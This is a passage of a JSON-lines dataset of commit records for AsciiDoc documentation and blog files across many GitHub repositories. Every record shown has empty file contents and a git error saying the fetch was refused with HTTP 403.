sdarimont\/spring-security,thomasdarimont\/spring-security,pwheel\/spring-security,djechelon\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,SanjayUser\/SpringSecurityPro,jgrandja\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,thomasdarimont\/spring-security,fhanik\/spring-security,djechelon\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,ollie314\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,djechelon\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96d8c9d326cc66b4b968cb2df4caaddbf73aa363","subject":"Added software document","message":"Added software document\n\nContains info about used software. 
Needs to get additional info about\nAWS and Google.\n","repos":"ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1","old_file":"documentation\/software.adoc","new_file":"documentation\/software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ohaz\/amos-ss15-proj1.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ef17280fa3f098762864ca5cc4eed12b6d39d364","subject":"Minor fixes on documentation.","message":"Minor fixes on documentation.\n","repos":"funcool\/cats,alesguzik\/cats,mccraigmccraig\/cats,OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0e32fa9cea1a642abda71535c1bea2fdaa411969","subject":"Deref for 7\/30\/21","message":"Deref for 7\/30\/21\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/30\/deref.adoc","new_file":"content\/news\/2021\/07\/30\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"fa8abea715af01fcfab7bf3d79a675471229eb46","subject":"Update 2017-08-08-Hello-World.adoc","message":"Update 2017-08-08-Hello-World.adoc","repos":"egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io","old_file":"_posts\/2017-08-08-Hello-World.adoc","new_file":"_posts\/2017-08-08-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/egorlitvinenko\/egorlitvinenko.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a31d6d0516f4d15fa97037365be5f664318b90db","subject":"Issue #33 - Create specification document outline","message":"Issue #33 - Create specification document outline\n\nSigned-off-by: Artur Dzmitryieu <0a3f547f43e496c127a2e6339e51bd0a18a1d5ae@ca.ibm.com>\n","repos":"arthurdm\/microprofile-open-api","old_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_file":"spec\/src\/main\/asciidoc\/microprofile-openapi-spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurdm\/microprofile-open-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"caf8f6ffcdd96cd6f35b2c36d38282092d8585ea","subject":"feat: update documentation","message":"feat: update documentation\n","repos":"Kronos-Integration\/kronos-interceptor-object-data-processor-chunk","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-interceptor-object-data-processor-chunk.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7a30f9986678c4814ea983e8ed88e2420845068d","subject":"Update 
2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f04e573552fbf369a66b469132bf9ee44729dd3b","subject":"y2b create post The Coolest Laptop You've Never Heard Of...","message":"y2b create post The Coolest Laptop You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-17-TheCoolestLaptopYouveNeverHeardOf.adoc","new_file":"_posts\/2017-12-17-TheCoolestLaptopYouveNeverHeardOf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e55b3c6d7f9334f98fe92437c20db668dc5b065","subject":"add adocs","message":"add adocs\n","repos":"przodownikR1\/springBootKata,przodownikR1\/springBootKata","old_file":"docs\/boot.adoc","new_file":"docs\/boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/przodownikR1\/springBootKata.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d0891c053cf6e2503825b2c30ad6d9abd18c560","subject":"Update 2017-09-30-Android-Developer-Courses.adoc","message":"Update 2017-09-30-Android-Developer-Courses.adoc","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-30-Android-Developer-Courses.adoc","new_file":"_posts\/2017-09-30-Android-Developer-Courses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1d911f8da868abd8fd5dd9f980ebd331aaa8289","subject":"chore(): add CHANGELOG.adoc","message":"chore(): add CHANGELOG.adoc\n","repos":"gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/graviteeio-access-management.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"726d17bbcfb8f406a9c8d87a7dd9db67bde66629","subject":"Update 2015-04-08-Zweites-Posting.adoc","message":"Update 2015-04-08-Zweites-Posting.adoc","repos":"abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io","old_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_file":"_posts\/2015-04-08-Zweites-Posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/abien\/abien.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f42864e4f0369ff08144b2c5e23f16ace140f7d","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7bef3842a35531179911ad7b89b4c7bd07b998e","subject":"Fix spelling mistake in docs","message":"Fix spelling mistake in docs\n","repos":"mccraigmccraig\/cats,yurrriq\/cats,funcool\/cats,OlegTheCat\/cats,alesguzik\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"505ce88f94261d1692b7ae9cd73fbe0f6a62bd86","subject":"Resolve #4610 Camel-Forge: Create Asciidoc file containing instructions related to Camel-forge","message":"Resolve #4610 Camel-Forge: Create Asciidoc file containing instructions related to Camel-forge\n","repos":"rhuss\/fabric8,dhirajsb\/fabric8,PhilHardwick\/fabric8,zmhassan\/fabric8,zmhassan\/fabric8,dhirajsb\/fabric8,sobkowiak\/fabric8,chirino\/fabric8v2,zmhassan\/fabric8,KurtStam\/fabric8,dhirajsb\/fabric8,sobkowiak\/fabric8,rajdavies\/fabric8,PhilHardwick\/fabric8,rhuss\/fabric8,zmhassan\/fabric8,chirino\/fabric8v2,gashcrumb\/fabric8,chirino\/fabric8v2,rajdavies\/fabric8,christian-posta\/fabric8,christian-posta\/fabric8,gashcrumb\/fabric8,PhilHardwick\/fabric8,PhilHardwick\/fabric8,EricWittmann\/fabric8,KurtStam\/fabric8,EricWittmann\/fabric8,EricWittmann\/fabric8,EricWittmann\/fabric8,dhirajsb\/fabric8,rhuss\/fabric8,rhuss\/fabric8,gashcrumb\/fabric8,KurtStam\/fabric8,sobkowiak\/fabric8,sobkowiak\/fabric8,rajdavies\/fabric8,christian-posta\/fabric8,rajdavies\/fabric8,KurtStam\/fabric8,chirino\/fabric8v2,gashcrumb\/fabric8,christian-posta\/fabric8","old_file":"forge\/addons\/camel\/README.asciidoc","new_file":"forge\/addons\/camel\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chirino\/fabric8v2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d703b83b2f1a3615fbc9d4f7ba8b5fa82cb09c1","subject":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"808b455c3683988c56f89a780287022968f4c3fd","subject":"Add link to GraphQL as well as the GraphQL 
specification","message":"Add link to GraphQL as well as the GraphQL specification\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17318560db34b2f12ae7a8b3984dc70ce875a030","subject":"Add review mins","message":"Add review mins","repos":"rmulvey\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,keithbrown\/mc,keithbrown\/mc,lwriemen\/mc,lwriemen\/mc,keithbrown\/mc,rmulvey\/mc,xtuml\/mc,keithbrown\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,rmulvey\/mc,keithbrown\/mc,lwriemen\/mc,cortlandstarrett\/mc,keithbrown\/mc,lwriemen\/mc,lwriemen\/mc","old_file":"doc\/review-minutes\/11571_mcmc_ciera_ant_rvm.adoc","new_file":"doc\/review-minutes\/11571_mcmc_ciera_ant_rvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f98c05e13d45210edf5aad420c85d5bd85be55fd","subject":"Update 2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","message":"Update 2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","new_file":"_posts\/2015-11-28-I-really-wish-that-Microsoft-would-allow-this-feature-to-be-turned-off.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/never-ask-never-know\/never-ask-never-know.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"effecd97334c8e8a16cc8b68c9300cc24e19da4f","subject":"KUDU-1268 - Fix CTAS example in docs","message":"KUDU-1268 - Fix CTAS example in docs\n\nWe had a CTAS example that had the AS SELECT part of the CTAS\nstatement before TBLPROPERTIES, which was wrong. 
This patch fixes\nthat.\n\nChange-Id: I45a74976bb398d9c91b3b4c82f4b84cc82d621f0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1505\nReviewed-by: Jean-Daniel Cryans\nTested-by: Jean-Daniel Cryans\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64d42b1d293a7e498025faedc53758df9f7a576a","subject":"Create database_migrations.adoc","message":"Create database_migrations.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/database_migrations.adoc","new_file":"userguide\/tutorials\/database_migrations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7733d34350dc10328136d96b048412a1685b52d6","subject":"week4 update","message":"week4 update\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cea7c332f49522dfda76f79ffb3c86f8bbc38d0d","subject":"Refine hawkular setup","message":"Refine hawkular setup\n","repos":"hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/14\/hawkular-miq.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/14\/hawkular-miq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d89331fb6291c96d74df04c3a18e7e23d93c73a","subject":"Add README for 'jenetics.xml' 
module.","message":"Add README for 'jenetics.xml' module.\n","repos":"jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics","old_file":"org.jenetics.xml\/README.adoc","new_file":"org.jenetics.xml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenetics\/jenetics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50301e9e65675b06bfb10ce44069b1cd55fb220c","subject":"Update 2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","message":"Update 2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","new_file":"_posts\/2016-08-07-Nodejs-Mongo-D-B-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c60e1e32e5bb521a69136ff9c9ecaacdd079a4b0","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8f6cd14e57d59f5774a900ff6739c9c7326d537","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32a8e0d53529c57790771642c53cbe251b79137e","subject":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","message":"Update 2016-07-22-Control-Arms-in-IVIG-Trials.adoc","repos":"zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io,zubrx\/zubrx.github.io","old_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_file":"_posts\/2016-07-22-Control-Arms-in-IVIG-Trials.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zubrx\/zubrx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a98c98ccd9f4783ef7bcdd54c350f890bd912d17","subject":"Update 2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","message":"Update 
2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","new_file":"_posts\/2015-06-12-Desarrollo-de-una-aplicacion-desde-cero-El-origen-de-datos-y-la-carga-inicial-de-datos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7641b63854057cb34c87a3bffe618123b6760db3","subject":"Correct DOCTYPE of GWT widgetset","message":"Correct DOCTYPE of GWT widgetset","repos":"Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework","old_file":"documentation\/clientside\/clientside-module.asciidoc","new_file":"documentation\/clientside\/clientside-module.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64e1867aab2312a1838ed5d2e6dd991e329f244f","subject":"Other kill features","message":"Other kill features\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9b65dadffe6e6bca82846bd056ee0b1e76abb57f","subject":"Update 2015-09-25-Blog-simplified.adoc","message":"Update 2015-09-25-Blog-simplified.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_file":"_posts\/2015-09-25-Blog-simplified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"affea85dc6cb01e69b4ff9dbe17be39f0885823d","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47990848f71bd79893a039456f2a4e57cc5bb49b","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"0466d26bec7254a4b6e7e3da2701184e068b08a7","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6486ad1697e95369e53676c5d0bc1a6bf07fbc5c","subject":"Added Camel 2.17.5 release notes to docs","message":"Added Camel 2.17.5 release notes to docs\n","repos":"objectiser\/camel,gnodet\/camel,kevinearls\/camel,objectiser\/camel,cunningt\/camel,punkhorn\/camel-upstream,kevinearls\/camel,alvinkwekel\/camel,DariusX\/camel,onders86\/camel,apache\/camel,jamesnetherton\/camel,apache\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,gnodet\/camel,zregvart\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,objectiser\/camel,Fabryprog\/camel,apache\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,CodeSmell\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,adessaigne\/camel,pmoerenhout\/camel,davidkarlsen\/camel,sverkera\/camel,DariusX\/camel,tdiesler\/camel,tdiesler\/camel,zregvart\/camel,Fabryprog\/camel,pmoerenhout\/camel,CodeSmell\/camel,onders86\/camel,zregvart\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,sverkera\/camel,anoordover\/camel,tadayosi\/camel,sverkera\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,onders86\/camel,mcollovati\/camel,pmoerenhout\/camel,tadayosi\/camel,anoordover\/camel,anoordover\/camel,tdiesler\/camel,alvinkwekel\/camel,mcollovati\/camel,cunningt\/camel,sverkera\/camel,adessaigne\/camel,Fabryprog\/camel,cunningt\/camel,ullgren\/camel,pax95\/camel,jamesnetherton\/camel,christophd\/camel,alvinkwekel\/camel,adessaigne\/camel,Fabryprog\/camel,sverkera\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,anoordover\/camel,ullgren\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,anoordover\/camel,christophd\/camel,adessaigne\/camel,zregvart\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,nicolaferraro\/camel,sverkera\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,anoordover\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,tadayosi\/camel,mcollovati\/camel,ullgren\/camel,nicolaferraro\/camel,tdiesler\/camel,DariusX\/camel,kevinearls\/camel,mcollovati\/camel,objectiser\/camel,pax95\/camel,davidkarlsen\/camel,onders86\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,jamesnetherton\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,kevinearls\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,apache\/camel,pax95\/camel,gnodet\/camel,jamesnetherton\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,onders86\/camel,onders86\/camel,ullgren\/camel,DariusX\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2175-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2175-release.adoc","new_contents":"","old_contents":"","returnc
